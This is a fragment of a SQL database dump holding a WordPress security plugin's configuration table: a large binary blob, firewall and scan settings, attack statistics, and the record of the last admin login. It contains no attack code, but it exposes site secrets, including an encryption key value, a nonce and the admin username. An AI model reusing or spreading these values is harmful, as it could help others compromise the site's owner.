.�E��@�ю.��%E��g���=�N3�>��g�|�S(F�jǕ\n��;�e��X�4P�iev���W�soڋ�L�QBW�b��e�x��A�j�,p�r��k�jV�i����]�A�\"�����3#�q Ɔ�\Z�)+�l\0#<9��\"ϕ���A��v�hz�J>A�q��W�&zU�V����\nW8� ��`�\0ayxHõ�נc��ΏͿͰ��9O�8�^^�]���t*f�%�YE���5�<�`�W��h���j0g�_M����TJ��\np��c‰[���_:E(.)�&$*~�(gf���;���c��\0̢��c�e�:Hb>R@\'=�v�@5)���y�&�֫����\r���;���&��؛ƿ�ػ�5|V�{�׾�A\rreAFzK`�\"�?��E��z��c�R��z��͞�.V�~!�6��k8������W\'�|ǘ��rf�H	/�@\':{�Y�T3NZ�O�Q˶ܩ8�N?5��n�A��.�y��a�餷�#���c���^S��A��_���7�\'hcv��]��#\':�z��K�l��?�Yk���2����W>���-�M��P�N`g?\\\n�\rK����\0��J<ǘ3bxT:�W*���r���-6�f�pxc�,hoN�I��[�\\�`�nB�7�$·#t�\"S�m��-��C�`��Ɋ��s�E#)(���A[�h�\'�����|�kaO�I��h�9A\08(�?�K\n���͠��ZNt�a�Z��f+Ǡ�\n�K������b��n8����1\"P�����&�8�X;�U^������LDL9�4�ݬJ��݃�C�lE<aLj����l�.ēz��]\n��\Z��:��zs\0nĽ���>�e�[7��NJ��tt�@�`�2Z�\'S�V�\"�*�XA�vk�Ox�ޡ�mdFFÅf��a+�6����)rb�4�ʲg��}S�x��vֻ�aʩ�D\05SS�-��*�^Ӆ�\\w����%`0����vl���\r���\n?�4ɿ�r֍�O�n��_4�`�/�-�\'��aYI|6���`Z�4��\n��\"��l\'��U8y�kSl�صA��(GL��8!��<z�Kr�i��ImV�e(iCx��/?���O���E�q���i7A:�3\r�����:�?��2=�,�+)�̻��n�g���3�(���D���a�!_y���	�Q�VGK��҂��sv@��N����\0�}A�v���A��$�=�08Q�j���V\\��P�[�pHa�F~yQ�ˊ������r���`��\Z���9�8Ra>r�Z��!�e%��d�uH/l+��ޠ�����.��I6��(�웎y�R�j�\nM����x\r.s�΂�����&�^��5P���n��>��:�����,G�I�z�R�쮝���y���Y#�dz�E	��92���������vnjs,_Y{\Zk��]�ٛz�J�^z���{�M����9l+:A��}0��0��.�@L��3�l囔�\\�Hiܵx�f�Ll#@Ť��e+�׹=����So\nhѱ�ً!J~ẞ�ǡɹ�Ὑ�g\r��y�uCx��;P{��k����yM��#�h�.���?��t#ɠ���\"���z)`��RI+�_#a�p[o��|\'�:@���A���} E��饬2,��)���w_�DʉԶ�͂���6j4�0F��Sc�\"��~��G8<\'���������:��M�6���/�U�9)�O������WT��>����S��0\0�;��QO�%$K�	���\'��͕{)��_���ĝ�#/q�&�O�[���O�\"²�,���l?2j&�����,�k����$t3��?iYϲYڷO��5]I��{�������ٚ�X�L�l����#,\n�W�Mb��X��zp)\'�F��{��Pniq��9�o��̳l5�y9�Mb�&�iK��ues�<%�qѬ6�I���F�_��\'Q�7�3#5XN��xL+�֖}	gTj��,�)0f������;7p>�Dy(�-s\'���#֛X�މ�Ά�>�풏�9�F�ܐ𱐠�d���ְH]@e�Pa�y�ŝ&)ԧ��0�x)/�mۅ�r�Uz�������&���[j�}wR�E����v�����{�A���G�5�F�i	�y*dq]�O��X=�ܞ“�W[B�\rDݬ����v�p���>��j*���욬�e�3�p�]�L��}�`��`��DX1���ع��WJ���]cƈf�	u�J0f�j\0ց�s��ZR�~�]���*����\"�rd��S�2�!�{�֣:=�Nz����g�&��$�F,�lK급/Í9�z�Üu��\Z\"�dm�*\Z���X�͹[I|�4r�_�xS����*t����^�&��/�\\$����r\\`ʳa���7%��eűCS6���ǀ�h�2.^W�w��H�î4����n�~2p{wq\Z.(�W�a�_N��C���n�d,y�p��U�~���2ʩ��w�:���jU�/��t#L���\"u�t��P�w\"��L�x|�(.ay�ѫu�#\Z�ڄe���u��uI�;o���,1�{��[rѸ5�b�,���B2��+Y�GH�Q�M��p+��i��2�vC����m��*�i���QLC�H8�RvJ��j��o���޼f2RFt���	{[O��b�4���?���fs^�Y��\0�������^���x�{��N�0Gu�D/�S���ā����;��%�mp2X[�j_aG�����v�@�2��b\\��\0����~*J�jT�\Zw�?/�c�g��)e�����Z~&�q��N7�� Z-�����r��$E�\Z3b\n���NyoH�N�mQ��va�N�/	�Y�!v�46]3�]��3�<���ڗ���<�*=�t󅡢pE�KL����[�Mrx%\0�b0qq�Ă��|x����:��_��V�5:�U��S�o2ҾP�u�A_�*}�~��\'K9�;�4��p���\n+=U�O�}��6Ԋ|���}<yﭼ։K�hxޫ(R���1�=~�P�w���ºT�+�In��\r{��M��_�໘`3x���4��L�#\\r��ԹF� \"�$q�c�@\n��C��KnA��O] �`�o���C��K�����.���U8u���i���H<pSh�Zذ/�\r.�O�}9�fP�k���o��2,�=A}P��#\r5�k��,P�D�+�>J��5딧�n���.\0U�Rq�k\'�����i_i,�\n�G��+L�.\rQ�\0��%�\'�y�m�_��#�?���E1\0�² �7��5mw>Z��2Q2K=�^N����q����Q\n�IS�}V#�N7=��ɷ�5���gD��>h]3��\n�0_�э�Wg��1*�V�����FIP���x��f�vL�@���p����R;K�����R��[:[��*w�(�1�� y��jL3ˇ�d�\'��V&}l��]dO��g��V��:���5��fH��A~l!�/�6�yԶ��!��[^�I�ٷO3��E�}{��Y�z������#���@���XaͰ]��()c�k��!~s�~h���q0���X?8�̅���H��i,+x��͵�SE��9�r=�#_~�\\�/Sͻ�(YC/#/�D��^>�6\\����V�6 E�i�*�X,��/�6������}%]�v�	��\ZY����<�}]�8�c��4=}�X�j(	;��w�g�ָ,\\R�0�$k�o�A��{������2#�am��\'��Y#��O��(&\r\n0�{z����7�j����R�v���^0�?�2Dh�4�SG�8RH�e���4ډ3�z\Zr�K,�Iޗ�Oe�x�џ��i}��.��kQ�_�3��9�y\n�b�-5c,R����3���\'�r��.]9c�x��ߚY9�\\~������f���Ƕh�j}u�pIX�p�ھΩT����/�6�F���k�T�E�;�H	#�ߛ���{�C\'Vۨ/��H_n{��FW��?^ծ�V��� �N	��-���j���s\Zjh߽C�ș�I��E�R���1��G�Ÿċ��d/8��Z{{�S�*Q�b�U�a����9e׽R��X�?楐�1���ih\Z�ҕ��X�T�9�����Eߎ�i��ц	�v���&�=G���V�kr2��C5����m��~q~���;rfXᅸ��eX�t�Ū.+[�����咩H{v���./s|U�Z��A�h$DU�s����I�{\'\01�������r���k��D����a�c���#k�Qbm(��(��{ia^�\\v�J��M��C�`QA6�_�~�j�c�,1��F\n)7��䩾!�@���	�n���K^$��N�Vj���q��`J�BZ�ޅ�J���X�0u�9�>�!��v1����v��ą�>���Ш�&�D�6X]`��=�s\0��1�y5z���4�O�š|p�A5�P���(fy���2��Э�9��ex�kz�B��4��6�Hy�/=��u4�_c���	ο\'���M|4��gE;+\\�)H�q��{�@�dX{a2�H�=���G��6Cm��:�|��!%��p8�Ug𿌫��A�N��y�qoʅ#&]�#mV�ە�rȹ���L�=��6m�zQh��Z������C�� ���T�α���i��ߠPom\\D5~�!�������o��a[�ce�U�>T��ø�~3��$:�З���e���W�_6|�T-�>{�rC\n�=���k��Rd�j��6���T������\'����3H�_cx��N���pn��x{V���@��f!��D.S��J/�xk�nZ�~q��6Lꂨ$����?{II%�&���V(Aw��<䩻���c�$�a�=�����!3C�PY��.c%�0b?O�)Mퟴ����[�%>xd�]?Z�񴝞1����5���q�)��9W/`��kW�V*�_i_\'h�Ma�CQW�~K�0�X~D�<���>�5�O!	U\'���IaӴ9+���6��fF��7�r,��?��O�P��\Z�r�(ga�u;Y�R�>�v\\��?s�k�\\� �~�m���V��|ݐ�\0��!��ٖX6���a�v�/%1U�Ed��_w\'�ޢ���KGs�*<v�u.������S��A`\n�	t���p\'��\\ˑ+&�*u4��c	\Z{\r�������@l(2�u���-V�����Jˀ��z�ا`*#��j�xZ��&�\Z�{C\rB�]���Y�#�<\0!_�M~(�����k��_�M��W��F�i�]������iˍ��B��l@��j�!�\0@�����Ų�3����pv`�r9H��(�c�WޏK\"�$��G�ϭ\'�6�I�\"�V�ɜ=��0������\Z����h݆֭<e1L�!ӳ��\Z��D�K��i��@*S�ĘRg���	r���z�2,o��Q���ϕ�FU���lt��*�g����V☲ù�����۬��Bj�LN��hZ��e%�D\'��G}w���E�k*	��W،j��|���K\'��l�Ȉ<������fdU�Ƭ����\\�fH���v��I�I��w�d�4\"�醗����0_��h�^1���-�c�j�Htfݬ�?���D)�\'��hcF,�4�|i�Ql�p��t�>�%y����1P�bB��R�����[B}�\n[���;	I2q�U�>�n)̈́��Ix��VV$��Z=��q�UO���c����\n���4�\r\'R�2�8�F(>F�2 ����\"Qj6�h��\'�Vh��~��Ad���7��D�c���A�\Z�H�zy�I����Q�]�o��%<��DN�N��M�^�^��/jC9�tb��p�\r<�!!d�e�p��\Z�	�0mz�����%�\ZN���:�J0��L��2��\"L��⯜t�%>��:1��W��R����ͩ��Q�i��~�^G�vr�`G�̃�S������$ �2|��>��Y�wM�W[�� ��I��/�H-j\r%�D��������+�P4�g.���{���^W��/!u����T �&gɖ�\r.��:�)�Q��7�ݣ� �h��\"b�Y(V��W�|/5[�r�ɷ*���M���l���r���n��zW��m:f�O&y(�H������\n�#_F�D:���1I�}U\"\0H�B�&`�8��m��!U�c%rT����.��q�x���=\0���\"�I�8c�_�;�k�6��R�r��E?{d���G_�A���7����c0+��^E��h1��{��9U�,���%k1X�\r Lc�N�;�<K�{�*�k�L������E,�t*�J�.	���*歁\\5��c�%�a��P�T��g�xȻ�=��|@� ԃ��\\��HVq2��v5�o��,�\0�7�IѴ�E�����90.BAe�4>�]y�S�Pk��=�9i��fCu	l6E�#�Zt,#<�\ZL�4Z���FU����!}\\֊��_ȕ��o�/B�\\!�Z<&�^�S���V�?���R�Ê�]��	���ͮ6���R��Ԥz��8�\\4��w��c���y����s���M�)9@����2���.���V�/B��c5a��\rRI�G>?���y;�+�����\'�SAE�D>����qqa�_��؈K)�A��/��YQ��;�#�6�yc�Ȍ�ʗ�j���L�2��-[� 3���]S���.��\\��0ה��B/\n�j�z\'a�����������F�L\Z�H-L	`$p1/>:r���V�Ǚ=={��Or�R�xg�J9G0>z�c&�IÆb4~�*L�Q�Rkg!i��f�nb.*��η���$�gw�T��#;?��`�?��;\"��A�Y|���X;u�a�w?oa���bN$��gI���+���R.�e�\Z����pt��ᣈ��:\Z�`\'8�y`���w�W�0���P��R�Ƈ��]�P�d��$*H��9\n?�g{��gs�	gO��X�I�#n���!F#Yȼv\"|�:�ݯCG#\nY�E[��V�w��i�%�-%F�\0��[�n�1S�a���+���]��B�E2�s�Ŏ)�?ԟ��B�	�*�Z�O��ےn+�z�`ߗ��]�^��$�d�g��Gf���m�G8�@~n��?�	x��*Ցx�k��S��략9�����U�R�ݼ\"�EI� {�`z��$��쨀q���Z6hֲC��R=�8H��ΐ��<���>�y��y�=� �؃��G��ө&����0��*����u�\0u�\r��+M\nMƿ�4��f�_�MG���%2q��0�/ғ:;��e�W�G��ʈ�P��,�K��A]H��%����A��Q�D�۞V蚹xRBBy%�h�Wv��Ƕm�}n�G>p��ѹ��W�����5�w���O�E�̾�m�G��. Ճ�g��?ƒ�r�Тjs$_�D&֗��H��᝭s%��v�x-���#����?	���T���5�)�\\Np�����[��>��&��]����:���.�ѥׇ���4���U���hnl���h��ʫ�jF�**\Z���W�nfrP#3�w֢$����¡桘3���D�\\�[�I�����wD�=O$l\Z�����I��9<��0ox�>��L1��\Z?���f�]��t2Ј���5�����I�v��C�(�߱wzi��C\038�\'U���$�S��(�]4�P�����cU�v�᢭�(�c�̈́ɯ�Tνڐ$_����S����Њ�|��|���n��D��~��v-�;&���W�0��;��7�\"�L~ޅ�LE�`!�)l�ʛ�hL��O�/̩3��z4�Κ�C:Ufz^^Gn����/�pR1�C�̬20�2�J�΍<��:�_��B!s*���l���6���\"Q_�ȹ�2���a7��<\\U}�\"A���s��?��C9����`�r���0É�����\0��1��y�i�N7,N]�8�Ϫ��������C�,01�Sͭ�-�a��b���pY�x{Vc�o��lNG�qlkb�����a��ñԟ�yb��@�Y���(J5}׸d�t`Mu���Ƃ�Uz[�w\\=ʼ\0[\nK�ix�-b>��,E�d�Ҕ�\nN�-���\0�9�pM0+��~0��:6r½c��	��h{�M\\����J��,�k\r?��O\Z/ކf���?�xȃ9��\rQP@\r��\Z���S�z�\n��E�O����wF.P��)n>��<���W��S)���_�]����Y�a�\'kY����_ot�r�)��C����E�I�m/�;����g�g�ŭ��Ʊ��0`���8^���\\��Ƌ�~���~�J��7$kSsYme(�|��.��ŹzZ��[����몾l�c�읋���q�oן���K�֛+���%�؂�!a�29\n����`�F_h��*�y��.�Z�ۭP�0��\"��j����=xat\\K��h���9����wǏ���;Z)���K�~���Q�[::��j�s���^Z@2n��ve)e_��u���!�9�]�we<���΁�iJkN���uM��ٍ��O�I0x{M�y�R\r�~��S���BST����h�Zs�*����[?	PO��v��DŌi*�b���*�;ةD�ڨ�n�/N����sh�w��k1]�\':�&e�t��b�t��*�\n\'�Z%��$^���*�B��R_~�;A���k8����\\=�>J����1�~(���Ac�q�o%TF�O-�Gz�JTN>�\'����#.�D�=����a�:��\'j�K�� WHS����`\r�y~E�~|�\nR�i)fl�饔e}�)ld�*�ÀI�F�^��ȯ�ܒ��W���@�~�ݘ�T�`�l�� �9��睪P�k�KV��d��*�X\0M�o��DO=h�W��\0 �7$����R�T�b��z�Hp�f��?�@јݲ�I�����G�]�q�M;��>l\nA���>��k�h���R���8�yO��t�ld�U�^��E�%O��n޹�~}���J[�An>���P:�����7��4iw����q��c�s� @�\"/��š|sP|0��ô����!�J��[h7e�^�J��T�u�V��څ�6���bJ�R�#��Բ�Yu�n�nO�������#�\r�F1_Ң\'�Sz�<�J8�@�b��c�\niz�N�y׊��}˜.��\Z�^�����*�̶=������.�)~��	�_OP�\n�x+��U��1�w��z�)�\"4�+�B\\���II�%�%�\"ЖX����~X4;;�]*�	�&���\"T�QWvRi��d�3�m�`a��3\r�45q$�&Β9QO*z�kB�������jdE,�Tg�OrP~�tgn�g���(�W�{v����^�Z��}ȐC6ݞ��+�?�۸Z�P�d?P�\\����kO��}H�\"F�+:̵LZ�KA�x����r�^/���\'�D�~�4�d���`8`q��׆dŪC*�k]�0ɾ\"���Ͷ#8K���r���|\Z�ゐ5�b�T2���ph=��������j�#�jR����	𪏨�|�z��03��ܸOV1�SlfwV��1	��l?��.\r��ƨ�;p���-�e*���`���[�p5U���ͳ���{���n���!z[�>�f�t4����s^�tE+W�L�կ��C��ҩχH�h�Z;P��.����s.��1��q�+܋\r�4�$Pd�uU1����8���<Kn�s���p�GR�b�:L��0�j}�y�슟W���Sh�5GH�;�V��(��(�\ZB\0�\r�lŗ���B�s�#3�?+��Wp�P�M�k]�<px_�\"R�Lki��G�Ap�\Z\\���?h��8���Q��$�d1��ˌ�GPP�(�Ϟ���S��3Q�?(H|,�;p��H@yƄ��k}�{��[��W{�LG�.�vOǫ�\"�M\r6Ic�����E��,M+,�ǖ��f�� �MP�[�Y&���\r��,���YDx��x����Vތ�\Z��~�VD���Z6�aW�_�tʩk�g�i\n�B�_��[�\0��7��4�w5���q��y����1�Щ3�&�Tt�ȹ��8��=��S�P�y�Ym���m��U�I���O�F	!������q��O�~þ`��Ϸ7�i.K���K�����;��3@��\"��_���d�/5�������%����9�U6>��Nc�V�M�Tp�W \r0�����Z|�\\�T�-��B�D\"�,Q�uܳ��n�����.������A\Z��X�m,��P\r�J�h��x�Q#��\0��tg���F���N���v��&�W\"�IJ�}:���k�S�-e&s�c��1h�ؗ]m3ĺXq�Ï��j�_�y�[+x�E��V0z���xi���\n���F�\n��7��4�欋\\�M�=���O����h������L;�-��F��\0��U��*/����d�.>z_�ME�MՏ-/v��_څc����?,U&��\"��R�[�R����|L���<uQR�V����x�s��	b[�y�i�C��\0����T�q@W~��{�Ṝg�IU9�\0���ڡSw�q�\\(LpR^��_m�o�<e��{�FE�P\n-����,5H��:��@���\r�%��-�����,$y��k�\\�3�딢ߓ{�B2�A����G�<��&%���߼w$���c�TV¶\r�|f�7hC�p\Z��8�w�G�+�dUx��Xc�ѨV�*�6�i(���H�Xw�6[�|�Ja�ʹ�Ж�q^����O�h;xA�3�-\r���hM�>kv7��[���ׇd�̂zR<��2���K�����7�I���I�!1&�j��[6����56i�8��n�t��l�*���?���/]�\Z�4�tX�*���5��2�.p�·�\"�F�6Zؙ\n��$z��z��\r�9`\\&S9�~{-LKŝI�T�i��;�u!���7�U�e�H> -��%G��(�m�\0���DO;��^�K��l����ظ!�/?aF�z��#�U�%f��{�x��i�<��f��;������K�Z9ްN��Wj_�H�]�͚V�I�R[냛�B�w�s��bN}�qY��7zo�U��u�\'���1��k���~P,o���ʂ-~�Bʾ�i>1�/#���#��y��X�oa��\\D�Şheb������h��?)�3��1�u��s��_s�Шd��>V�*R��/\0�����ӷ�~r�%�\"������8lb�κ��\"�7e�E�=n~��͙\'2�C/�����r�\r�̈�\r�;�J�U�ˑ-�\\B��?��	C�Q���c2 G������e��h��h��݌^�@�˶\\},n���ۛ~A�F�,���{�<n�н�>!��2��_U�d~��p��7O\";}���r\0','no'),('currentCronKey','','yes'),('dashboardData','a:4:{s:9:\"generated\";i:1629710728;s:3:\"tdf\";a:3:{s:9:\"community\";i:4203;s:7:\"premium\";i:4410;s:9:\"blacklist\";i:22977;}s:10:\"attackdata\";a:3:{s:3:\"24h\";a:24:{i:0;a:2:{s:1:\"t\";i:1629622800;s:1:\"c\";i:12942023;}i:1;a:2:{s:1:\"t\";i:1629626400;s:1:\"c\";i:12769194;}i:2;a:2:{s:1:\"t\";i:1629630000;s:1:\"c\";i:12890401;}i:3;a:2:{s:1:\"t\";i:1629633600;s:1:\"c\";i:15247875;}i:4;a:2:{s:1:\"t\";i:1629637200;s:1:\"c\";i:15502695;}i:5;a:2:{s:1:\"t\";i:1629640800;s:1:\"c\";i:18110128;}i:6;a:2:{s:1:\"t\";i:1629644400;s:1:\"c\";i:13443338;}i:7;a:2:{s:1:\"t\";i:1629648000;s:1:\"c\";i:12795555;}i:8;a:2:{s:1:\"t\";i:1629651600;s:1:\"c\";i:13639331;}i:9;a:2:{s:1:\"t\";i:1629655200;s:1:\"c\";i:12992847;}i:10;a:2:{s:1:\"t\";i:1629658800;s:1:\"c\";i:13268118;}i:11;a:2:{s:1:\"t\";i:1629662400;s:1:\"c\";i:13560146;}i:12;a:2:{s:1:\"t\";i:1629666000;s:1:\"c\";i:13148024;}i:13;a:2:{s:1:\"t\";i:1629669600;s:1:\"c\";i:13297405;}i:14;a:2:{s:1:\"t\";i:1629673200;s:1:\"c\";i:13101761;}i:15;a:2:{s:1:\"t\";i:1629676800;s:1:\"c\";i:13006165;}i:16;a:2:{s:1:\"t\";i:1629680400;s:1:\"c\";i:13099403;}i:17;a:2:{s:1:\"t\";i:1629684000;s:1:\"c\";i:13130885;}i:18;a:2:{s:1:\"t\";i:1629687600;s:1:\"c\";i:13204101;}i:19;a:2:{s:1:\"t\";i:1629691200;s:1:\"c\";i:13138794;}i:20;a:2:{s:1:\"t\";i:1629694800;s:1:\"c\";i:17648512;}i:21;a:2:{s:1:\"t\";i:1629698400;s:1:\"c\";i:18866025;}i:22;a:2:{s:1:\"t\";i:1629702000;s:1:\"c\";i:18273593;}i:23;a:2:{s:1:\"t\";i:1629705600;s:1:\"c\";i:18051591;}}s:2:\"7d\";a:7:{i:0;a:2:{s:1:\"t\";i:1629072000;s:1:\"c\";i:391199178;}i:1;a:2:{s:1:\"t\";i:1629158400;s:1:\"c\";i:343903823;}i:2;a:2:{s:1:\"t\";i:1629244800;s:1:\"c\";i:279955995;}i:3;a:2:{s:1:\"t\";i:1629331200;s:1:\"c\";i:333766144;}i:4;a:2:{s:1:\"t\";i:1629417600;s:1:\"c\";i:408199071;}i:5;a:2:{s:1:\"t\";i:1629504000;s:1:\"c\";i:385410218;}i:6;a:2:{s:1:\"t\";i:1629590400;s:1:\"c\";i:356174498;}}s:3:\"30d\";a:30:{i:0;a:2:{s:1:\"t\";i:1627084800;s:1:\"c\";i:311865363;}i:1;a:2:{s:1:\"t\";i:1627171200;s:1:\"c\";i:320312206;}i:2;a:2:{s:1:\"t\";i:1627257600;s:1:\"c\";i:317207149;}i:3;a:2:{s:1:\"t\";i:1627344000;s:1:\"c\";i:336084005;}i:4;a:2:{s:1:\"t\";i:1627430400;s:1:\"c\";i:332561379;}i:5;a:2:{s:1:\"t\";i:1627516800;s:1:\"c\";i:355466812;}i:6;a:2:{s:1:\"t\";i:1627603200;s:1:\"c\";i:392765817;}i:7;a:2:{s:1:\"t\";i:1627689600;s:1:\"c\";i:382674688;}i:8;a:2:{s:1:\"t\";i:1627776000;s:1:\"c\";i:387472247;}i:9;a:2:{s:1:\"t\";i:1627862400;s:1:\"c\";i:360458952;}i:10;a:2:{s:1:\"t\";i:1627948800;s:1:\"c\";i:341594999;}i:11;a:2:{s:1:\"t\";i:1628035200;s:1:\"c\";i:305257643;}i:12;a:2:{s:1:\"t\";i:1628121600;s:1:\"c\";i:319419592;}i:13;a:2:{s:1:\"t\";i:1628208000;s:1:\"c\";i:433021973;}i:14;a:2:{s:1:\"t\";i:1628294400;s:1:\"c\";i:408772034;}i:15;a:2:{s:1:\"t\";i:1628380800;s:1:\"c\";i:392751990;}i:16;a:2:{s:1:\"t\";i:1628467200;s:1:\"c\";i:395394236;}i:17;a:2:{s:1:\"t\";i:1628553600;s:1:\"c\";i:396069090;}i:18;a:2:{s:1:\"t\";i:1628640000;s:1:\"c\";i:392001867;}i:19;a:2:{s:1:\"t\";i:1628726400;s:1:\"c\";i:399323472;}i:20;a:2:{s:1:\"t\";i:1628812800;s:1:\"c\";i:420189173;}i:21;a:2:{s:1:\"t\";i:1628899200;s:1:\"c\";i:402171941;}i:22;a:2:{s:1:\"t\";i:1628985600;s:1:\"c\";i:340802483;}i:23;a:2:{s:1:\"t\";i:1629072000;s:1:\"c\";i:391199178;}i:24;a:2:{s:1:\"t\";i:1629158400;s:1:\"c\";i:343903823;}i:25;a:2:{s:1:\"t\";i:1629244800;s:1:\"c\";i:279955995;}i:26;a:2:{s:1:\"t\";i:1629331200;s:1:\"c\";i:333766144;}i:27;a:2:{s:1:\"t\";i:1629417600;s:1:\"c\";i:408199071;}i:28;a:2:{s:1:\"t\";i:1629504000;s:1:\"c\";i:385410218;}i:29;a:2:{s:1:\"t\";i:1629590400;s:1:\"c\";i:356174498;}}}s:9:\"countries\";a:1:{s:2:\"7d\";a:10:{i:0;a:2:{s:2:\"cd\";s:2:\"US\";s:2:\"ct\";i:1180475318;}i:1;a:2:{s:2:\"cd\";s:2:\"DE\";s:2:\"ct\";i:274456424;}i:2;a:2:{s:2:\"cd\";s:2:\"FR\";s:2:\"ct\";i:259189923;}i:3;a:2:{s:2:\"cd\";s:2:\"IN\";s:2:\"ct\";i:223894912;}i:4;a:2:{s:2:\"cd\";s:2:\"SG\";s:2:\"ct\";i:184989046;}i:5;a:2:{s:2:\"cd\";s:2:\"CN\";s:2:\"ct\";i:161966569;}i:6;a:2:{s:2:\"cd\";s:2:\"RU\";s:2:\"ct\";i:158842270;}i:7;a:2:{s:2:\"cd\";s:2:\"CA\";s:2:\"ct\";i:121541593;}i:8;a:2:{s:2:\"cd\";s:2:\"BR\";s:2:\"ct\";i:120736630;}i:9;a:2:{s:2:\"cd\";s:2:\"GB\";s:2:\"ct\";i:119443266;}}}}','yes'),('dbTest','a:1:{s:5:\"nonce\";s:64:\"c6627a6ab0b4c301db8c22b7519efdcb0a0eebfcd08af6c1cb01ae768d1977a3\";}','no'),('dbVersion','10.5.11-MariaDB-1:10.5.11+maria~focal','yes'),('debugOn','0','yes'),('deleteTablesOnDeact','0','yes'),('detectProxyNextCheck','1629599739','no'),('detectProxyNonce','','no'),('detectProxyRecommendation','REMOTE_ADDR','no'),('diagnosticsWflogsRemovalHistory','[]','no'),('disableCodeExecutionUploads','0','yes'),('disableConfigCaching','0','yes'),('disableWAFIPBlocking','0','yes'),('disclosureStates','a:4:{s:44:\"wf-unified-global-options-view-customization\";b:0;s:28:\"wf-unified-waf-options-basic\";b:1;s:31:\"wf-unified-waf-options-advanced\";b:1;s:35:\"wf-unified-blocking-options-country\";b:0;}','yes'),('dismissAutoPrependNotice','0','yes'),('displayAutomaticBlocks','1','yes'),('displayTopLevelBlocking','0','yes'),('displayTopLevelLiveTraffic','0','yes'),('displayTopLevelOptions','1','yes'),('emailedIssuesList','a:24:{i:0;a:2:{s:7:\"ignoreC\";s:32:\"6fd0d290b978eab8027e6b79501ac149\";s:7:\"ignoreP\";s:32:\"6fd0d290b978eab8027e6b79501ac149\";}i:1;a:2:{s:7:\"ignoreC\";s:32:\"c2cc7f450148a90571b8d5253f63230c\";s:7:\"ignoreP\";s:32:\"254408267a023d416200b25fb7229954\";}i:2;a:2:{s:7:\"ignoreC\";s:32:\"d08b917fccbe0c11d438c1e2b624ff7e\";s:7:\"ignoreP\";s:32:\"1ab2c0d5e47db3ec5681c7e882289e8d\";}i:3;a:2:{s:7:\"ignoreC\";s:32:\"edfe19fcfd0189e98940fe699d4b4c17\";s:7:\"ignoreP\";s:32:\"4c24be48f968d69bd60314fae3bc37d1\";}i:4;a:2:{s:7:\"ignoreC\";s:32:\"ab6b105a8c7c7115f6a6a397bfa953fd\";s:7:\"ignoreP\";s:32:\"a85cae3b1a00dda355c3ded5339a4c3c\";}i:5;a:2:{s:7:\"ignoreC\";s:32:\"44c9694bf8fafec3d3d15c94a2499d1e\";s:7:\"ignoreP\";s:32:\"bc0e1e98251a9ecbbbfd1638b3a60bff\";}i:6;a:2:{s:7:\"ignoreC\";s:32:\"620c3ffdf68920e27a7834b774547252\";s:7:\"ignoreP\";s:32:\"f0ca8859087c27712491046669d9090e\";}i:7;a:2:{s:7:\"ignoreC\";s:32:\"d11b3440081ddccd55bfdf2cc2a11901\";s:7:\"ignoreP\";s:32:\"6c0d45deb56eb69f4100ab72b98d18a2\";}i:8;a:2:{s:7:\"ignoreC\";s:32:\"a7b1d80a7b7c9a37dd357357f80720d4\";s:7:\"ignoreP\";s:32:\"66fc81b51e18fb67e3ff8b11bd378ebe\";}i:9;a:2:{s:7:\"ignoreC\";s:32:\"483fe8d0dc2f62591bc8c2efc2190bd8\";s:7:\"ignoreP\";s:32:\"54b1379f429ead0b05c5679d25ddfe92\";}i:10;a:2:{s:7:\"ignoreC\";s:32:\"baaf322ae29febdddecae999f621ac77\";s:7:\"ignoreP\";s:32:\"64bac185b3e6cab863ec6f49ca6a61e3\";}i:11;a:2:{s:7:\"ignoreC\";s:32:\"f04101cb1c2293a58617826ec94a99c1\";s:7:\"ignoreP\";s:32:\"f04101cb1c2293a58617826ec94a99c1\";}i:12;a:2:{s:7:\"ignoreC\";s:32:\"561bf4d1e2c35d38ce67bb5fa3dcd741\";s:7:\"ignoreP\";s:32:\"561bf4d1e2c35d38ce67bb5fa3dcd741\";}i:13;a:2:{s:7:\"ignoreC\";s:32:\"9240ea17331cebd6d2505aa3bf651783\";s:7:\"ignoreP\";s:32:\"9240ea17331cebd6d2505aa3bf651783\";}i:14;a:2:{s:7:\"ignoreC\";s:32:\"4215230377354b899cb8bd1b0ba04441\";s:7:\"ignoreP\";s:32:\"4215230377354b899cb8bd1b0ba04441\";}i:15;a:2:{s:7:\"ignoreC\";s:32:\"2d02e1363029a0877c959739dfe69ec7\";s:7:\"ignoreP\";s:32:\"2d02e1363029a0877c959739dfe69ec7\";}i:16;a:2:{s:7:\"ignoreC\";s:32:\"025c26de8ba21fb217fbebe882d39206\";s:7:\"ignoreP\";s:32:\"025c26de8ba21fb217fbebe882d39206\";}i:17;a:2:{s:7:\"ignoreC\";s:32:\"b1f40133224ebd37d11a57212569e7b7\";s:7:\"ignoreP\";s:32:\"b1f40133224ebd37d11a57212569e7b7\";}i:18;a:2:{s:7:\"ignoreC\";s:32:\"b4aa3a5a0b6b6ad3791cccd0ead6da3c\";s:7:\"ignoreP\";s:32:\"b4aa3a5a0b6b6ad3791cccd0ead6da3c\";}i:19;a:2:{s:7:\"ignoreC\";s:32:\"2fe1115c1ca9c416ae1e8e7aea44d03e\";s:7:\"ignoreP\";s:32:\"2fe1115c1ca9c416ae1e8e7aea44d03e\";}i:20;a:2:{s:7:\"ignoreC\";s:32:\"544e3fe2328061a91199ead81e0d4530\";s:7:\"ignoreP\";s:32:\"544e3fe2328061a91199ead81e0d4530\";}i:21;a:2:{s:7:\"ignoreC\";s:32:\"81537aa5b5f58b3ef7e5a56c105f8224\";s:7:\"ignoreP\";s:32:\"81537aa5b5f58b3ef7e5a56c105f8224\";}i:22;a:2:{s:7:\"ignoreC\";s:32:\"fb86e4ebe867e990771a8152d9b622a0\";s:7:\"ignoreP\";s:32:\"fb86e4ebe867e990771a8152d9b622a0\";}i:23;a:2:{s:7:\"ignoreC\";s:32:\"bc8f0369ee64b7d15686360f9e78d45f\";s:7:\"ignoreP\";s:32:\"91260e7d7bc041493753ee8a9c1805b8\";}}','yes'),('email_summary_dashboard_widget_enabled','1','yes'),('email_summary_enabled','1','yes'),('email_summary_excluded_directories','wp-content/cache,wp-content/wflogs','yes'),('email_summary_interval','weekly','yes'),('encKey','f41be4cecdb0a6f2','yes'),('fileContentsGSB6315Migration','1','yes'),('firewallEnabled','1','yes'),('geoIPVersionHash','e5ee69a4db1e318c2a1668873a8f5074012abb9852f5596fe3feaa8c07dac334','yes'),('howGetIPs','','yes'),('howGetIPs_trusted_proxies','','yes'),('isPaid','','yes'),('keyType','free','yes'),('lastAdminLogin','a:6:{s:6:\"userID\";i:1;s:8:\"username\";s:5:\"admin\";s:9:\"firstName\";s:0:\"\";s:8:\"lastName\";s:0:\"\";s:4:\"time\";s:28:\"Mon 